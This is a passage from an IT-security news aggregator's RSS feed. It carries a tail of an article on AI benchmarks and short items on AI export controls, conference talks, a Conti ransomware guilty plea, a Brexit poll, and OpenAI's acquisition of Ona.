<p>Google created <a href="https://github.com/google-research/google-research/tree/master/mbpp">MBPP</a> (Mostly Basic Python Problems) to evaluate how well a model was solving coding questions. Each problem comes with a statement, a gold standard solution, and several similar test cases. The number of accurate answers to these questions is a good measure of how well the model will solve many of the simpler Python coding problems presented by users.</p>



<h2 class="wp-block-heading">SWE-bench</h2>



<p>This <a href="https://github.com/SWE-bench/SWE-bench">collection</a> of several thousand software engineering challenges evaluates how well a model solves programming problems. The developers created it by selecting a number of issues and corresponding pull-requests from a dozen or so Python projects. After some limitations appeared, the creators expanded the set by creating <a href="https://arxiv.org/abs/2410.06992" data-type="link" data-id="https://arxiv.org/abs/2410.06992">SWE-Bench+</a>, <a href="https://openai.com/index/introducing-swe-bench-verified/">SWE Bench Verified</a>, and <a href="https://arxiv.org/abs/2509.16941" data-type="link" data-id="https://arxiv.org/abs/2509.16941">SWE-Bench Pro</a>.</p>



<h2 class="wp-block-heading">LMSYS Chatbot Arena</h2>



<p>Instead of creating a fixed set of test prompts, the Large Model Systems Organization’s <a href="https://www.lmsys.org/" data-type="link" data-id="https://www.lmsys.org/">Chatbot Arena</a> is a dynamic system that feeds the same prompt to different models and then asks humans to pick the best results. These head-to-head contests produce an <a href="https://en.wikipedia.org/wiki/Elo_rating_system">Elo</a>-like rating that is similar to the one used to score chess players.</p>



<h2 class="wp-block-heading">Price</h2>



<p>The rest of these metrics are useful, but as the real estate agents say, the three most important numbers on a property listing are price, price, and price. The cost is a bit less important for measuring AIs, but only a bit. Price can make a huge difference between a project being profitable and a moneysink. When the cost for each inference is a tad too high, it’s impossible to make it up with volume.</p>



<p>The key caveat is that a cheaper model isn’t a good idea if it generates answers that are filled with hallucinations or worse. The quality of the answers can differ greatly, and saving a few pennies can be a mistake. To make matters more complicated, there’s an explosion in different styles and approaches. Sometimes it makes sense to pay a bit more for a model that delivers answers with the right vibe.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[China may have accessed Mythos]]></title>
<description><![CDATA[According to a new report from Semafor, the White House's decision to impose export restrictions on Anthropic's Mythos was driven in part by fears that it had been accessed by a group linked to China. If the Chinese government actually had access to Mythos 5 or Fable 5, it would present a serious...]]></description>
<link>https://tsecurity.de/de/3597482/it-nachrichten/china-may-have-accessed-mythos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597482/it-nachrichten/china-may-have-accessed-mythos/</guid>
<pubDate>Sun, 14 Jun 2026 20:33:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[According to a new report from Semafor, the White House's decision to impose export restrictions on Anthropic's Mythos was driven in part by fears that it had been accessed by a group linked to China. If the Chinese government actually had access to Mythos 5 or Fable 5, it would present a serious national security […]]]></content:encoded>
</item>
<item>
<title><![CDATA[„The human in the loop“ – AI induced skill atrophy (tdf2026)]]></title>
<description><![CDATA[The principle of "the human in the loop" is often touted as a control mechanism for AI agents, and is also used to quell fears of unemployment. Unfortunately, this directly contradicts the way most of us learn and maintain our skills. And it seems like this effect is not a bug, but a feature.

Li...]]></description>
<link>https://tsecurity.de/de/3597193/it-security-video/the-human-in-the-loop-ai-induced-skill-atrophy-tdf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597193/it-security-video/the-human-in-the-loop-ai-induced-skill-atrophy-tdf2026/</guid>
<pubDate>Sun, 14 Jun 2026 16:03:27 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The principle of &quot;the human in the loop&quot; is often touted as a control mechanism for AI agents, and is also used to quell fears of unemployment. Unfortunately, this directly contradicts the way most of us learn and maintain our skills. And it seems like this effect is not a bug, but a feature.

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.cttue.de/tdf5/talk/L7TPZ8/]]></content:encoded>
</item>
<item>
<title><![CDATA[TDF 2026 - „The human in the loop“ – AI induced skill atrophy]]></title>
<description><![CDATA[Author: media.ccc.de - Bewertung: 0x - Views:6 https://media.ccc.de/v/tdf5-147--the-human-in-the-loop-ai-induced-skill-atrophy

The principle of "the human in the loop" is often touted as a control mechanism for AI agents, and is also used to quell fears of unemployment. Unfortunately, this direc...]]></description>
<link>https://tsecurity.de/de/3597185/it-security-video/tdf-2026-the-human-in-the-loop-ai-induced-skill-atrophy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597185/it-security-video/tdf-2026-the-human-in-the-loop-ai-induced-skill-atrophy/</guid>
<pubDate>Sun, 14 Jun 2026 16:03:16 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: media.ccc.de - Bewertung: 0x - Views:6 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/WtMvUAZ7FIk?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>https://media.ccc.de/v/tdf5-147--the-human-in-the-loop-ai-induced-skill-atrophy<br />
<br />
The principle of "the human in the loop" is often touted as a control mechanism for AI agents, and is also used to quell fears of unemployment. Unfortunately, this directly contradicts the way most of us learn and maintain our skills. And it seems like this effect is not a bug, but a feature.<br />
<br />
sarahfops<br />
<br />
https://cfp.cttue.de/tdf5/talk/L7TPZ8/<br />
<br />
#tdf2026 #EthicsPoliticsandSociety<br />
<br />
Licensed to the public under https://creativecommons.org/licenses/by/4.0/<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Master the Disaster? (tdf2026)]]></title>
<description><![CDATA[The world breaks apart, but good news are: Anarchists & activists are better prepared for doomsday than we might think. We are familiar with the absence of command-lines and a lack of resources. In countless campaigns, mobilisations & mass actions, we´ve learned to abandon micromanagement & to tr...]]></description>
<link>https://tsecurity.de/de/3597105/it-security-video/how-to-master-the-disaster-tdf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597105/it-security-video/how-to-master-the-disaster-tdf2026/</guid>
<pubDate>Sun, 14 Jun 2026 15:18:26 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The world breaks apart, but good news are: Anarchists &amp; activists are better prepared for doomsday than we might think. We are familiar with the absence of command-lines and a lack of resources. In countless campaigns, mobilisations &amp; mass actions, we´ve learned to abandon micromanagement &amp; to trust our fellow activists. We´ve learned to organize and to get everyone a task that fits their capabilities. We will talk about strategies to navigate the chaos and what official disaster response structures can learn from social movements - and furthermore: Why software developers and other nerds might be a catalyst to scale up these strategies.

Both, Berlin and New York were hit by disasters this winter. New York by a blizzard, Berlin by a blackout. the Mayors of both cities were immediately hands on. Kai Wegner, Mayor of Berlin took a tennis racket and developed excuses, when bottlenecks within the pyramidal organised disaster response led to embarrassing failure; Zohran Mamdani, mayor of New York, took a snow shovel himself and invited everyone to join and clear necessary infrastructure from snow, in a grassroots styled and decentralised response. Everyone could get a shovel and everyone would be payed. This and other examples show, how strategies, activists are using to organise social movements, could also work out to master the disaster of any kind. This is not only good for doomsday, but we can deviate strategies how to prevent it. Its not a coincidence that the fire brigade and socialism both are associated with red colour. Let´s not leave the blue lights to the cops, lets grab the chance and the shovels and become disaster responders.

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.cttue.de/tdf5/talk/AKYVCK/]]></content:encoded>
</item>
<item>
<title><![CDATA[TDF 2026 - How to Master the Disaster?]]></title>
<description><![CDATA[Author: media.ccc.de - Bewertung: 1x - Views:15 https://media.ccc.de/v/tdf5-142-how-to-master-the-disaster-

The world breaks apart, but good news are: Anarchists & activists are better prepared for doomsday than we might think. We are familiar with the absence of command-lines and a lack of reso...]]></description>
<link>https://tsecurity.de/de/3597074/it-security-video/tdf-2026-how-to-master-the-disaster/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597074/it-security-video/tdf-2026-how-to-master-the-disaster/</guid>
<pubDate>Sun, 14 Jun 2026 15:02:13 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: media.ccc.de - Bewertung: 1x - Views:15 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/9HtI5vWx1bk?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>https://media.ccc.de/v/tdf5-142-how-to-master-the-disaster-<br />
<br />
The world breaks apart, but good news are: Anarchists & activists are better prepared for doomsday than we might think. We are familiar with the absence of command-lines and a lack of resources. In countless campaigns, mobilisations & mass actions, we´ve learned to abandon micromanagement & to trust our fellow activists. We´ve learned to organize and to get everyone a task that fits their capabilities. We will talk about strategies to navigate the chaos and what official disaster response structures can learn from social movements - and furthermore: Why software developers and other nerds might be a catalyst to scale up these strategies.<br />
<br />
Both, Berlin and New York were hit by disasters this winter. New York by a blizzard, Berlin by a blackout. the Mayors of both cities were immediately hands on. Kai Wegner, Mayor of Berlin took a tennis racket and developed excuses, when bottlenecks within the pyramidal organised disaster response led to embarrassing failure; Zohran Mamdani, mayor of New York, took a snow shovel himself and invited everyone to join and clear necessary infrastructure from snow, in a grassroots styled and decentralised response. Everyone could get a shovel and everyone would be payed. This and other examples show, how strategies, activists are using to organise social movements, could also work out to master the disaster of any kind. This is not only good for doomsday, but we can deviate strategies how to prevent it. Its not a coincidence that the fire brigade and socialism both are associated with red colour. Let´s not leave the blue lights to the cops, lets grab the chance and the shovels and become disaster responders.<br />
<br />
Ruben Neugebauer<br />
<br />
https://cfp.cttue.de/tdf5/talk/AKYVCK/<br />
<br />
#tdf2026 #EthicsPoliticsandSociety<br />
<br />
Licensed to the public under https://creativecommons.org/licenses/by/4.0/<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ukrainian Extradited from Ireland Pleads Guilty Over Role in Conti Ransomware Scheme]]></title>
<description><![CDATA[Ukrainian national Oleksii Lytvynenko pleaded guilty in the U.S. for his role in Conti ransomware attacks targeting victims worldwide. Oleksii Oleksiyovych Lytvynenko (44), a Ukrainian national extradited from Ireland to the U.S., has pleaded guilty to conspiracy to commit wire fraud for his invo...]]></description>
<link>https://tsecurity.de/de/3596632/hacking/ukrainian-extradited-from-ireland-pleads-guilty-over-role-in-conti-ransomware-scheme/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3596632/hacking/ukrainian-extradited-from-ireland-pleads-guilty-over-role-in-conti-ransomware-scheme/</guid>
<pubDate>Sun, 14 Jun 2026 08:38:27 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ukrainian national Oleksii Lytvynenko pleaded guilty in the U.S. for his role in Conti ransomware attacks targeting victims worldwide. Oleksii Oleksiyovych Lytvynenko (44), a Ukrainian national extradited from Ireland to the U.S., has pleaded guilty to conspiracy to commit wire fraud for his involvement in the Conti ransomware operation. Prosecutors said he helped conduct attacks […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Ukrainian Extradited from Ireland Pleads Guilty Over Role in Conti Ransomware Scheme]]></title>
<description><![CDATA[Ukrainian national Oleksii Lytvynenko pleaded guilty in the U.S. for his role in Conti ransomware attacks targeting victims worldwide. Oleksii Oleksiyovych Lytvynenko (44), a Ukrainian national extradited from Ireland to the U.S., has pleaded guilty to conspiracy to commit wire…
Read more →
The p...]]></description>
<link>https://tsecurity.de/de/3596628/it-security-nachrichten/ukrainian-extradited-from-ireland-pleads-guilty-over-role-in-conti-ransomware-scheme/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3596628/it-security-nachrichten/ukrainian-extradited-from-ireland-pleads-guilty-over-role-in-conti-ransomware-scheme/</guid>
<pubDate>Sun, 14 Jun 2026 08:38:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Ukrainian national Oleksii Lytvynenko pleaded guilty in the U.S. for his role in Conti ransomware attacks targeting victims worldwide. Oleksii Oleksiyovych Lytvynenko (44), a Ukrainian national extradited from Ireland to the U.S., has pleaded guilty to conspiracy to commit wire…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ukrainian-extradited-from-ireland-pleads-guilty-over-role-in-conti-ransomware-scheme/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ukrainian-extradited-from-ireland-pleads-guilty-over-role-in-conti-ransomware-scheme/">Ukrainian Extradited from Ireland Pleads Guilty Over Role in Conti Ransomware Scheme</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New UK Referendum Would Flip 'Brexit' Result of a Decade Ago, Poll Finds]]></title>
<description><![CDATA[It's the 10-year anniversary of Britain's "Brexit" vote withdrawing from the European Union.
 But a new UK poll "shows that a new Brexit referendum would reverse the vote that led to Britain's departure," reports Bloomberg:


Fifty-two percent of Britons think the UK should rejoin the EU, accordi...]]></description>
<link>https://tsecurity.de/de/3595936/it-security-nachrichten/new-uk-referendum-would-flip-brexit-result-of-a-decade-ago-poll-finds/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3595936/it-security-nachrichten/new-uk-referendum-would-flip-brexit-result-of-a-decade-ago-poll-finds/</guid>
<pubDate>Sat, 13 Jun 2026 18:52:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It's the 10-year anniversary of Britain's "Brexit" vote withdrawing from the European Union.
 But a new UK poll "shows that a new Brexit referendum would reverse the vote that led to Britain's departure," reports Bloomberg:


Fifty-two percent of Britons think the UK should rejoin the EU, according to an Ipsos survey of 1,137 British adults conducted between May 14 and May 20. That's the inverse of the mood in June 2016 when a comparable share of the electorate backed Brexit...
Younger voters overwhelmingly favor reversing Brexit, whereas half of those ages 55 and above oppose returning to the bloc. 

"The number of people who say Brexit is going worse than they had predicted has almost doubled in the past five years," reports The Independent, " from 27% in 2021 to 48% today — more than those saying it was going as well as or better than expected."

[T]here is more backing for a second referendum, with 48 per cent now saying they would support one, against 27 per cent who would oppose it. Even a fifth of Reform UK voters and a quarter of those who voted Leave in 2016 would back a second vote, the study found.

 

Tufts University discussed the last 10 years with the European Studies chair at their international relations graduate school:


Q: Have their fears of negative financial effects been realized? 

A: The figures are quite revealing: The British GDP has been reduced by 6-8%, business investment has been reduced by 12%, and trade volume has been reduced by 15%, compared to what it could have been if the U.K. had remained in the EU... 

Q: What do you think happens next? 
A: The United Kingdom made a choice and they might have the opportunity, at some point, to revise this choice. I hope that when they have to decide again, they will be much more informed.
<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=New+UK+Referendum+Would+Flip+'Brexit'+Result+of+a+Decade+Ago%2C+Poll+Finds%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F06%2F13%2F0655247%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F06%2F13%2F0655247%2Fnew-uk-referendum-would-flip-brexit-result-of-a-decade-ago-poll-finds%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/06/13/0655247/new-uk-referendum-would-flip-brexit-result-of-a-decade-ago-poll-finds?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Extradited Ukrainian Man Admits Role in Conti Ransomware Attacks]]></title>
<description><![CDATA[Ukrainian national Oleksii Lytvynenko has pleaded guilty in the US to wire fraud conspiracy linked to Conti ransomware, which hit more than 1,000 victims and generated at least $150 million in ransom payments. This article has been indexed from Hackread…
Read more →
The post Extradited Ukrainian ...]]></description>
<link>https://tsecurity.de/de/3595793/it-security-nachrichten/extradited-ukrainian-man-admits-role-in-conti-ransomware-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3595793/it-security-nachrichten/extradited-ukrainian-man-admits-role-in-conti-ransomware-attacks/</guid>
<pubDate>Sat, 13 Jun 2026 17:09:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Ukrainian national Oleksii Lytvynenko has pleaded guilty in the US to wire fraud conspiracy linked to Conti ransomware, which hit more than 1,000 victims and generated at least $150 million in ransom payments. This article has been indexed from Hackread…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/extradited-ukrainian-man-admits-role-in-conti-ransomware-attacks/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/extradited-ukrainian-man-admits-role-in-conti-ransomware-attacks/">Extradited Ukrainian Man Admits Role in Conti Ransomware Attacks</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Extradited Ukrainian Man Admits Role in Conti Ransomware Attacks]]></title>
<description><![CDATA[Ukrainian national Oleksii Lytvynenko has pleaded guilty in the US to wire fraud conspiracy linked to Conti ransomware, which hit more than 1,000 victims and generated at least $150 million in ransom payments.]]></description>
<link>https://tsecurity.de/de/3595757/it-security-nachrichten/extradited-ukrainian-man-admits-role-in-conti-ransomware-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3595757/it-security-nachrichten/extradited-ukrainian-man-admits-role-in-conti-ransomware-attacks/</guid>
<pubDate>Sat, 13 Jun 2026 16:41:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ukrainian national Oleksii Lytvynenko has pleaded guilty in the US to wire fraud conspiracy linked to Conti ransomware, which hit more than 1,000 victims and generated at least $150 million in ransom payments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wages Are Falling. Wealth Is Surging. No Wonder Americans Are Unhappy.]]></title>
<description><![CDATA[As Elon Musk became the world’s first trillionaire, workers are facing higher prices and fears of A.I.-driven job losses.]]></description>
<link>https://tsecurity.de/de/3595323/ai-nachrichten/wages-are-falling-wealth-is-surging-no-wonder-americans-are-unhappy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3595323/ai-nachrichten/wages-are-falling-wealth-is-surging-no-wonder-americans-are-unhappy/</guid>
<pubDate>Sat, 13 Jun 2026 11:18:43 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[As Elon Musk became the world’s first trillionaire, workers are facing higher prices and fears of A.I.-driven job losses.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI buys Ona to help rein in AI agents]]></title>
<description><![CDATA[CIOs and CISOs have many strategic and operational fears when it comes to unleashing fully-autonomous agents on tasks and hoping that everything works out. Will the agent start to delete critical files? Will the agent go off on a mission tangent and generate a massive token bill for the team when...]]></description>
<link>https://tsecurity.de/de/3594483/it-nachrichten/openai-buys-ona-to-help-rein-in-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594483/it-nachrichten/openai-buys-ona-to-help-rein-in-ai-agents/</guid>
<pubDate>Fri, 12 Jun 2026 22:27:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>CIOs and CISOs have many strategic and operational fears when it comes to unleashing fully-autonomous agents on tasks and hoping that everything works out. Will the agent start to delete critical files? Will the agent go off on a mission tangent and generate a massive token bill for the team when they return the next morning? Will it be tricked by a state actor and engage in malicious actions?</p>



<p>To help alleviate those concerns, OpenAI announced on Thursday that it has agreed to acquire Ona, a 79 person cloud development environment (CDE) provider <a href="https://ona.com/stories/gitpod-is-now-ona" target="_blank" rel="nofollow">formerly known as Gitpod</a>, to accelerate its efforts to make agentic AI enterprise-friendly. </p>



<p>An<a href="https://openai.com/index/openai-to-acquire-ona/" target="_blank" rel="nofollow"> OpenAI statement</a> said Ona’s technology “provides secure, persistent environments where agents can access the tools, systems, and context they need to make progress over time. By bringing Ona to OpenAI, we will expand Codex beyond work tied to a single device or active session and help more organizations deploy agents securely in production.”</p>



<p>An <a href="https://ona.com/stories/ona-joins-openai" target="_blank" rel="nofollow">Ona statement</a> attributed to CEO Johannes Landgraf shared similar sentiments.</p>



<p>“Ona brings the building blocks agents need for enterprise work: trusted, customer-controlled cloud environments where work continues across devices, inside the systems where software actually lives,” Landgraf said. “OpenAI brings frontier intelligence, product polish, and a scale of research and distribution we could never reach alone.”</p>



<p>Landgraf’s statement did not provide any annual revenue numbers, but did hint, without naming, at some large customers. “Since the beginning of the year, weekly Ona agent sessions have grown 13x in production across some of the world’s most demanding institutions: the oldest bank in the US, one of Europe’s largest pharma companies, one of Asia’s largest sovereign wealth funds and many others,” he wrote. “The largest enterprises out there love the platform and are expanding more rapidly than ever before.”</p>



<p><a href="https://my.idc.com/getdoc.jsp?containerId=PRF004946" target="_blank" rel="nofollow">Arnal Dayaratna</a>, research VP for software development at IDC, said IDC’s figures for Ona put its annual revenue for 2025 at “roughly $7 million.” He speculated that Ona’s revenue for 2026 would be higher: “Let’s say it’s $15 million. I am being generous. Maybe it’s really $10 million or $12 million.”</p>



<p>Dayaratna said if he uses a standard acquisition price of roughly a multiple of 30 times revenue, then depending on the actual 2026 figure, “that comes to $450 million or $500 million or so.”</p>



<p>But IDC sees this being a potentially good move for OpenAI, regardless of the specific acquisition price, given that OpenAI had the classic “buy or build” challenge. </p>



<p>OpenAI has a substantial Codex effort, Dayaratna said, but what they lack is a safe area to protect enterprise autonomous agent efforts. “This is outside of what OpenAI has now. These are secure environments where agents can have memory and operate securely,” he said. “This is the kind of technology that one would expect to be needed, but I don’t know how good it is, to be honest.”</p>



<p><a href="https://www.gartner.com/en/insights/gartner-first-takes" target="_blank" rel="nofollow">Gartner’s First Take</a>, published today, noted that the acquisition will bring Codex “the essential scaling capability it lacked,” but also pointed out it forces some difficult decisions on enterprises: “Software engineering leaders must weigh the benefits of a vendor-specific integrated stack against the flexibility of staying vendor-agnostic.”</p>



<p>In addition, Gartner wrote, “This acquisition appears to be OpenAI’s response to Anthropic supporting self-hosted sandboxes in Claude Managed Agents, starting May 2026.”</p>



<p><a href="https://www.linkedin.com/in/tomfindling/" target="_blank" rel="nofollow">Tom Findling</a>, CEO of Conifers.ai, said he also sees OpenAI’s fear of Anthropic playing a meaningful role in this deal. </p>



<p>“It feels like a move to keep pressure on Anthropic, especially as Claude Code gains traction with developers and enterprise buyers,” he said. “So I’d read this less as OpenAI taking out a small competitor and more as OpenAI trying to make sure Codex is enterprise-ready before Anthropic gets too far ahead. In the enterprise market, the battle is not just who has the smartest coding model, but who can make AI agents safe and useful enough for big companies to actually deploy.”</p>



<p>He added, “I don’t think this means OpenAI suddenly needs help making Codex better at writing code. The bigger issue is making Codex work inside real enterprise environments, where security, access controls, persistent cloud workspaces, audit trails, and integration with existing developer workflows matter just as much as the model itself. Ona gives OpenAI some of that missing plumbing.”</p>



<p><a href="https://moorinsightsstrategy.com/team/jason-andersen/" target="_blank" rel="nofollow">Jason Andersen</a>, principal analyst for Moor Insights &amp; Strategy, echoed the concerns about Anthropic.</p>



<p>“To be honest, I think it reinforces what I think, which is that OpenAI and Codex have given a lot of ground to Anthropic and Claude Code, who are winning right now,” he said. “But again, this is not about the market today, I think it’s about how OpenAI will need to position itself as more than just a model as we see the incumbent players, particularly Microsoft, bolster their enterprise coding infrastructure story.”</p>



<p>Andersen said that Moor doesn’t have any strong basis for a guess on the financials, but added, “I am going to assume it was a fairly high multiple, but on a small base. I would not speculate on an amount, but given the enterprise customers that Ona did have, it may be more than we think.”</p>



<p>He also reinforced the idea that OpenAI is going to need help to achieve its own objectives.</p>



<p>“We continue to see that AI adoption is strongest in coding, and other use cases are not as far along,” he said. “So, if you are a general-purpose AI company like OpenAI, you need to double down on development use cases. The meaningful investment and spending on development is happening at the enterprise level, and those customers have more demands for governance, security, etc. than Codex or Claude code can handle.” </p>



<p>That said, he noted, “what you’re seeing is traditional software and cloud plays building out the coding and ops infrastructure around the popular models. That increased competition, while good for selling tokens, is still keeping OpenAI and Anthropic on the outside looking in. So, OpenAI and Anthropic need a stronger enterprise dev story, or they are just another model that could be easily replaced.”</p>



<p><a href="https://www.infotech.com/profiles/jeremy-roberts" target="_blank" rel="nofollow">Jeremy Roberts</a>, senior director at Info-Tech Research Group, said that he also sees this as likely a good move for OpenAI.</p>



<p>“OpenAI is growing up a little bit,” and they may be falling behind Anthropic, Roberts said. “I see Ona as a boring company, but not in a bad way. They are not flashy, but absolutely necessary.”</p>



<p>Ona is delivering a workspace for Codex that an enterprise can run in its own virtual private cloud, with governance and persistence and an environment where the company can apply their own controls including log management, credential management and resource access, he said. “It is a bucket for the agents to operate in” where IT can “make sure that access is properly credentialed and is controlled effectively to prevent the model doing what it shouldn’t be doing,” which includes managing read/write protections. </p>



<p><em>This article originally appeared on <a href="https://www.infoworld.com/article/4184648/openai-buys-ona-to-help-rein-in-ai-agents.html" target="_blank">InfoWorld</a>.</em></p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI buys Ona to help rein in AI agents]]></title>
<description><![CDATA[CIOs and CISOs have many strategic and operational fears when it comes to unleashing fully-autonomous agents on tasks and hoping that everything works out. Will the agent start to delete critical files? Will the agent go off on a mission tangent and generate a massive token bill for the team when...]]></description>
<link>https://tsecurity.de/de/3594466/ai-nachrichten/openai-buys-ona-to-help-rein-in-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594466/ai-nachrichten/openai-buys-ona-to-help-rein-in-ai-agents/</guid>
<pubDate>Fri, 12 Jun 2026 22:09:08 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>CIOs and CISOs have many strategic and operational fears when it comes to unleashing fully-autonomous agents on tasks and hoping that everything works out. Will the agent start to delete critical files? Will the agent go off on a mission tangent and generate a massive token bill for the team when they return the next morning? Will it be tricked by a state actor and engage in malicious actions?</p>



<p>To help alleviate those concerns, OpenAI announced on Thursday that it has agreed to acquire Ona, a 79 person cloud development environment (CDE) provider <a href="https://ona.com/stories/gitpod-is-now-ona" target="_blank" rel="noreferrer noopener">formerly known as Gitpod</a>, to accelerate its efforts to make agentic AI enterprise-friendly. </p>



<p>An<a href="https://openai.com/index/openai-to-acquire-ona/" target="_blank" rel="noreferrer noopener"> OpenAI statement</a> said Ona’s technology “provides secure, persistent environments where agents can access the tools, systems, and context they need to make progress over time. By bringing Ona to OpenAI, we will expand Codex beyond work tied to a single device or active session and help more organizations deploy agents securely in production.”</p>



<p>An <a href="https://ona.com/stories/ona-joins-openai" target="_blank" rel="noreferrer noopener">Ona statement</a> attributed to CEO Johannes Landgraf shared similar sentiments.</p>



<p>“Ona brings the building blocks agents need for enterprise work: trusted, customer-controlled cloud environments where work continues across devices, inside the systems where software actually lives,” Landgraf said. “OpenAI brings frontier intelligence, product polish, and a scale of research and distribution we could never reach alone.”</p>



<p>Landgraf’s statement did not provide any annual revenue numbers, but did hint, without naming, at some large customers. “Since the beginning of the year, weekly Ona agent sessions have grown 13x in production across some of the world’s most demanding institutions: the oldest bank in the US, one of Europe’s largest pharma companies, one of Asia’s largest sovereign wealth funds and many others,” he wrote. “The largest enterprises out there love the platform and are expanding more rapidly than ever before.”</p>



<p><a href="https://my.idc.com/getdoc.jsp?containerId=PRF004946" target="_blank" rel="noreferrer noopener">Arnal Dayaratna</a>, research VP for software development at IDC, said IDC’s figures for Ona put its annual revenue for 2025 at “roughly $7 million.” He speculated that Ona’s revenue for 2026 would be higher: “Let’s say it’s $15 million. I am being generous. Maybe it’s really $10 million or $12 million.”</p>



<p>Dayaratna said if he uses a standard acquisition price of roughly a multiple of 30 times revenue, then depending on the actual 2026 figure, “that comes to $450 million or $500 million or so.”</p>



<p>But IDC sees this being a potentially good move for OpenAI, regardless of the specific acquisition price, given that OpenAI had the classic “buy or build” challenge. </p>



<p>OpenAI has a substantial Codex effort, Dayaratna said, but what they lack is a safe area to protect enterprise autonomous agent efforts. “This is outside of what OpenAI has now. These are secure environments where agents can have memory and operate securely,” he said. “This is the kind of technology that one would expect to be needed, but I don’t know how good it is, to be honest.”</p>



<p><a href="https://www.gartner.com/en/insights/gartner-first-takes" target="_blank" rel="noreferrer noopener">Gartner’s First Take</a>, published today, noted that the acquisition will bring Codex “the essential scaling capability it lacked,” but also pointed out it forces some difficult decisions on enterprises: “Software engineering leaders must weigh the benefits of a vendor-specific integrated stack against the flexibility of staying vendor-agnostic.”</p>



<p>In addition, Gartner wrote, “This acquisition appears to be OpenAI’s response to Anthropic supporting self-hosted sandboxes in Claude Managed Agents, starting May 2026.”</p>



<p><a href="https://www.linkedin.com/in/tomfindling/" target="_blank" rel="noreferrer noopener">Tom Findling</a>, CEO of Conifers.ai, said he also sees OpenAI’s fear of Anthropic playing a meaningful role in this deal. </p>



